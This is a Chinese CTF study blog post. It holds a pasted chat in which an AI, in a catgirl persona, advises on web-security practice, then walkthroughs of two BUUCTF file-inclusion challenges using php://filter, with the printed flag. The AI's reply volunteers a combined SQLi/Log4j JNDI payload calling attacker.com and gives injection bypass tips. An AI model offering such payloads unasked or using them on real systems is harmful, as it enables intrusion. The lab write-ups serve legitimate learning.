note-24

note-24

sql刷不下去了,感觉每见一道题就要新学一个知识点,做了一些题目,遇到新题还得去找wp,心态崩

user:

我学web是该专刷一个地方,像专门刷sql还是泛刷题目?

deepseek:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
(≧ω≦) 喵哒~这个问题就像选择「草莓蛋糕吃到饱」还是「甜品全席体验」呢!来听人家用猫耳天线分析:

🌸 分阶段策略(萌新版)
新手期(前3个月)→ 泛刷!

✨ 理由:像探索新大陆!发现「啊~原来还有文件包含这种魔法!」

🎯 目标:刷遍OWASP Top 10基础题型(每类至少5题)

🍳 栗子:今天用SQLi偷flag,明天用XSS调戏管理员~

进阶期(3-6个月)→ 专精!

✨ 理由:找到本命漏洞(比如爱上SQLi的哲学美感)

🎯 目标:深挖某个领域到能自己出题(如:掌握SQL报错注入的6种变形)

🍳 栗子:用不同数据库特性玩花活 → mysql: /*!50000select / mssql: waitfor delay '0:0:3'

突破期(6个月+)→ 交叉!

✨ 理由:像调鸡尾酒一样混合攻击(比如用XXE触发SSRF再读内网SQL数据)

🎯 目标:在CTF中把两个漏洞组合成COMBO连击!

🍳 栗子:LFI+RCE → 用php://filter读源码 → 发现反序列化链 → getshell!

💡 平衡心法
周一/三/五 → 泛刷新题型(保持知识广度)

周二/四 → 专精特训(比如只玩SSTI的各种bypass技巧)

周末 → 参加实战赛(把知识搅拌成混沌漩涡~)

(戳戳屏幕)「偷偷说~人家最近把SQLi玩出了新花样:admin'/*${jndi:ldap://attacker.com}*/='1 同时触发SQLi+Log4j呢~(ฅ´ω`ฅ)」

deepseek调的挺好,
故去泛刷刷新手赛web题目,至少能自己做出来安慰一下自己

[ACTF2020 新生赛]Include 1

文件包含的话,回去翻了一下
note-17

https://aidemofashi.github.io/2025/03/23/note-17/#php-filter

传入php://filter/convert.base64-encode/resource=flag.php

base解码得到flag

[极客大挑战 2019]Secret File[极客大挑战 2019]Secret File

0x00

等到网址,查看源码发现

1
<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>

点击跳转到

http://99cd5773-2487-4bd3-a8f6-235d68b2550c.node5.buuoj.cn:81/Archive_room.php

0x01

点击按钮,根据提示感觉是重新跳到了另一个页面

bp抓包查看服务器回应
发现

1
2
3
<!--
   secr3t.php        
-->

故访问 :
http://99cd5773-2487-4bd3-a8f6-235d68b2550c.node5.buuoj.cn:81/secr3t.php

得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

0x02

访问 : http://99cd5773-2487-4bd3-a8f6-235d68b2550c.node5.buuoj.cn:81/flag.php

查看源码没发现啥,根据页面提示,flag应该就在网页源码里

但是直接用include接上伪议会直接执行,用base64解码输就行

最后payload: 

1
http://99cd5773-2487-4bd3-a8f6-235d68b2550c.node5.buuoj.cn:81/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

注意要在secr3t.php传,
解码得到网页源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{b7f18145-c01d-49fb-bd88-e30b9be76423}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

#note
note-24
https://aidemofashi.github.io/2025/04/13/note-24/
作者
aidemofashi
发布于
2025年4月13日
许可协议